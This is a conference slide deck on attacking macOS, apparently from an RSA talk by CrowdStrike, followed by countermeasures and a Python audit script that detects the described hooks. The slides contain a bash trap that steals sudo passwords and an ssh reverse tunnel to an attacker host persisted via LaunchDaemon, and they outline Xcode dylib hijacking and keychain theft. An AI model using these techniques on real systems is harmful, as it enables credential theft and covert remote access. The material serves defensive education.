#RSAC
HACKING EXPOSED: MAC ATTACK
SESSION ID: EXP-R04

Dmitri Alperovitch
Co-Founder & CTO
CrowdStrike Inc.
@DAlperovitch

George Kurtz
Co-Founder, President & CEO
CrowdStrike Inc.
@George_Kurtz

A LITTLE ABOUT US: GEORGE KURTZ
In security for 20+ years
President & CEO, CrowdStrike
Former CTO, McAfee
Former CEO, Foundstone
Co-Author, Hacking Exposed

A LITTLE ABOUT US: DMITRI ALPEROVITCH
Co-Founder & CTO, CrowdStrike
Former VP Threat Research, McAfee
Author of the Operation Aurora, Night Dragon and Shady RAT reports
MIT Tech Review’s Top 35 Innovators Under 35 for 2013
Foreign Policy’s Top 100 Leading Global Thinkers for 2013

The Ninjas
Matt Bauer, Sr. Software Engineer, CrowdStrike
Jaron Bradley, Sr. Intrusion Analyst, CrowdStrike

Agenda
Mac Attacks
OSX Security Features
Tradecraft
The Setup & Attack Plan
Demo
Countermeasures

Mac market share rising
Desktop/Laptop Market Share 2012-2016 (source: StatCounter; share in %)
Year    Windows   Mac
2012    89.9      7.47
2013    90.55     7.66
2014    88.83     8.72
2015    86.8      9.33
2016    84.83     9.14

Mac Attacks
Winter 2006: Leap Worm
  Spreads as an archive sent over iChat to local users
  Limited harmful impact
Fall 2007: RSPlug
  DNSChanger variant for Mac
  Distributed as a fake video codec on porn sites
  Changed DNS servers to redirect to phishing and porn sites
Fall 2010: Koobface
  Mac version of the infamous Facebook worm

Mac Attacks (cont)
Fall 2011: Flashback Worm
  > 700,000 infected users
  Infection via drive-by Java exploit
Winter 2012: Gh0st RAT OSX Variant (MacControl)
  KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists
  Delivered via Java and Office exploits
Summer 2012: OSX/Crisis (Attribution: Hacking Team)
  Discovered in targeted intrusions
  Monitors and records Skype, Adium, web browsing
  Rootkit capabilities

Mac Attacks (cont)
Fall 2013: OSX/Leverage
  Discovered in targeted intrusions related to Syria
  Written in RealBasic
Winter 2016: FakeFlash
  Signed fake Flash Player update
  Installs scareware (FakeAV style)

Apple Security Features

OSX Security Features
Leopard: 2007
  Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web
  Partial ASLR
  App Sandbox (Seatbelt)
Snow Leopard: 2009
  XProtect: AV-style blacklist updated monthly by Apple
Lion: 2011
  FileVault: full-disk encryption
  NX, Full ASLR

OSX Security Features (cont)
Mountain Lion: 2012
  Gatekeeper
  Kernel ASLR
Mavericks: 2013
  Support for code-signing of kernel extensions
El Capitan: 2015
  Full requirement to code-sign kernel extensions
  System Integrity Protection: prevents the root user from tampering with key system files, raises the bar for rootkits and prevents code injection
  App Transport Security (ATS): HTTPS with forward secrecy by default in apps

Tradecraft

Challenges to solve
Initial infiltration: Code Execution
How to get around Gatekeeper?
Possibilities
1. Exploit browser (e.g. Java, Flash, native browser exploit)
2. Exploit productivity app (e.g. Office, Preview, Adium)
3. Spearphish user with link/attachment (with Gatekeeper hack)

Bypassing Gatekeeper
Great research by Patrick Wardle @ Synack (VB2015 paper)
Challenges to solve (cont)
16
Privilege Escalation
How to become root?
Possibilities
1. Privesc exploit
2. Hook sudo in bash
getpwd () {
if [[ $BASH_COMMAND == sudo* ]]; then
printf “Password:”
read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173
echo –e “nSorry, try again.n”
fi
}
trap getpwd DEBUG
3. Ask the user during install

Challenges to solve (cont)
Persistence and Command & Control
How to gain & keep remote access?
Possibilities
1. Malware
2. Reverse ssh tunnel
   ssh -fN -R ${PortFwd}:localhost:22 acc@attackbox
   a. Save in plist file
   b. Convert to binary with
      plutil -convert binary1 ${ASEPplist}
   c. Save in /System/Library/LaunchDaemons (use SIP exception file)

Challenges to solve (cont)
Stealth
How to keep hidden from easy discovery?
Possibilities
1. Malware rootkit hooks
2. Bash hooks in /etc/profile
   (screenshots: "ps aux" before hook, "ps aux" after hook)

Challenges to solve (cont)
Permanent backdoor
How do we quietly backdoor many other systems/applications?
Ken Thompson: “Reflections on Trusting Trust” (1984)
Lesson: Backdooring the compiler is the ultimate win
Idea: Let’s hijack the XCode compilation process

XCode hijacking
Yet again, great research by Patrick Wardle (CanSecWest 2015)
Dylib hijacking (similar to DLL hijacking on Windows)
1. Place a malicious dylib in the search path of the XCode application
2. Intercept compilation requests and inject backdoor source code, removing any information from the build log
3. PROFIT!

Putting it all together: Setup & Attack Plan

Attack Overview
1. Send spearphish “Software Update” package to victim
2. Package it up with signed binary vulnerable to Gatekeeper bypass
3. Steal root password via UI prompt and sudo hook (failsafe)
4. Establish persistent SSH reverse tunnel via ASEP plist
5. Hook /etc/profile to hide our SSH tunnel, files and root activities
6. Steal victim keychain through SSH tunnel
7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil)
8. Implant Xcode malicious Dylib to backdoor compiled applications
9. WIN!

Network Setup
(diagram; systems shown:)
  Windows File Share
  Victim Mac System
  Attacker Macbook (for keychain extraction)
  Attacker C2

DEMO

Countermeasures
Keep a close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc
Monitor for suspicious network connections out of your environment
Monitor for any suspicious DYLIB writes to key /Applications and /System directories
Use next-generation Endpoint Detection & Response (EDR) solutions
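One way to turn the countermeasures on this slide, together with the persistence and stealth slides before it, into a check, as an added example that is not the presenters' code: it scans the startup files named here for the DEBUG-trap sudo hook and a shell-level redefinition of ps, and reads LaunchDaemon plists (XML or binary1) for a job that starts an ssh reverse tunnel. The sample tree, its file contents and the com.example.* job labels are constructed for the example.

```python
"""Audit macOS shell startup files and launchd jobs for the hooks and the
reverse-ssh persistence described in the deck (added example, not the
presenters' code; the sample tree below is constructed so it runs offline)."""
import os
import plistlib
import re
import tempfile

# Startup files the Countermeasures slide says to keep a close eye on.
STARTUP_FILES = ["/etc/profile", "/etc/.bashrc", "~/.bash_profile",
                 "~/.bashrc", "~/.bash_logout", "~/.inputrc"]

# Textual indicators of the deck's tradecraft: a DEBUG trap that inspects
# $BASH_COMMAND for sudo, a silent password read, and a redefined ps.
HOOK_PATTERNS = {
    "debug_trap": re.compile(r"\btrap\s+\S+\s+DEBUG\b"),
    "sudo_command_match": re.compile(r"\$BASH_COMMAND\s*==\s*sudo"),
    "silent_read": re.compile(r"\bread\s+-s\b"),
    "ps_redefined": re.compile(r"^\s*(?:ps\s*\(\)|function\s+ps\b|alias\s+ps=)",
                               re.MULTILINE),
}

def scan_startup_file(path):
    """Return the sorted indicator names that match in one startup file."""
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except FileNotFoundError:
        return []
    return sorted(name for name, rx in HOOK_PATTERNS.items() if rx.search(text))

def scan_launchd_plist(path):
    """Report whether a launchd job starts ssh with a reverse forward (-R).
    plistlib reads XML and binary1 alike, so 'plutil -convert binary1' does not hide it."""
    with open(path, "rb") as fh:
        job = plistlib.load(fh)
    args = [str(a) for a in job.get("ProgramArguments", [])]
    is_ssh = bool(args) and os.path.basename(args[0]) == "ssh"
    # A short option cluster such as -R or -fNR carries the reverse forward.
    reverse = any(a.startswith("-") and not a.startswith("--") and "R" in a
                  for a in args[1:])
    return {"path": path, "label": job.get("Label", ""),
            "command": " ".join(args), "ssh_reverse_tunnel": is_ssh and reverse}

def audit(root, home, launchd_dir):
    """Run both checks. `root` prefixes the /etc paths and `home` the ~/ paths,
    so the audit can be pointed at a mounted image or the sample tree below."""
    findings = {"startup_hooks": {}, "reverse_tunnels": []}
    for name in STARTUP_FILES:
        path = (os.path.join(home, name[2:]) if name.startswith("~/")
                else os.path.join(root, name.lstrip("/")))
        hits = scan_startup_file(path)
        if hits:
            findings["startup_hooks"][name] = hits
    for entry in sorted(os.listdir(launchd_dir)):
        if entry.endswith(".plist"):
            rec = scan_launchd_plist(os.path.join(launchd_dir, entry))
            if rec["ssh_reverse_tunnel"]:
                findings["reverse_tunnels"].append(rec)
    return findings

def build_sample_tree():
    """Constructed sample: a hooked /etc/profile, a clean ~/.bashrc, one benign
    LaunchDaemon and one reverse-ssh LaunchDaemon, both stored as binary1."""
    root = tempfile.mkdtemp(prefix="macaudit-")
    etc = os.path.join(root, "etc")
    home = os.path.join(root, "Users", "victim")
    daemons = os.path.join(root, "System", "Library", "LaunchDaemons")
    for d in (etc, home, daemons):
        os.makedirs(d)
    with open(os.path.join(etc, "profile"), "w") as fh:
        fh.write("# constructed sample with the shape of the deck's hooks\n"
                 "getpwd () {\n  if [[ $BASH_COMMAND == sudo* ]]; then\n"
                 "    read -s PASS\n  fi\n}\ntrap getpwd DEBUG\n"
                 'ps () { command ps "$@"; }\n')
    with open(os.path.join(home, ".bashrc"), "w") as fh:
        fh.write("export PATH=/usr/local/bin:$PATH\n")
    jobs = {"com.example.benign": ["/usr/bin/true"],
            "com.example.updater": ["/usr/bin/ssh", "-fN", "-R",
                                    "2222:localhost:22", "acc@attackbox"]}
    for label, argv in jobs.items():
        with open(os.path.join(daemons, label + ".plist"), "wb") as fh:
            plistlib.dump({"Label": label, "ProgramArguments": argv,
                           "RunAtLoad": True}, fh, fmt=plistlib.FMT_BINARY)
    return root, home, daemons

if __name__ == "__main__":
    print(audit(*build_sample_tree()))
```

On a live system, point `audit` at `/`, the user's home directory and /Library/LaunchDaemons or /System/Library/LaunchDaemons; the grep-style indicators are deliberately narrow, so treat a hit as a lead to inspect the file, not as proof.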

THANK YOU!
HOW TO REACH US:
TWITTER: @GEORGE_KURTZ & @DALPEROVITCH
LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION
LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS
REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/
COME MEET US: BOOTH 2045 SOUTH HALL
